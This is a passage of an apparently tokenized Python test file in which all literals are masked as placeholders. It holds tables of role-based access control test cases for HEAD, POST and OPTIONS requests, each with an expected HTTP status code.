None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' 
, '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) <EOL> ] <EOL> RBAC_HEAD_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> 
) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , 
<NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_POST = [ <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , 
<NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , 
'<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_POST_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , 
None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , None , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> 
( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:POST>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT> ) <EOL> ] <EOL> RBAC_OPTIONS = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , 
None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , 
<NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , 
<EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , None , None , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , None , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , None , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , None , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT:*>" } , <EOL> None , '<STR_LIT>' , None , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" 
, "<STR_LIT>" : "<STR_LIT:GET>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , <EOL> { "<STR_LIT>" : "<STR_LIT>" } , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) <EOL> ] <EOL> RBAC_OPTIONS_WITH_SERVICE_PREFIX = [ <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , None , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( 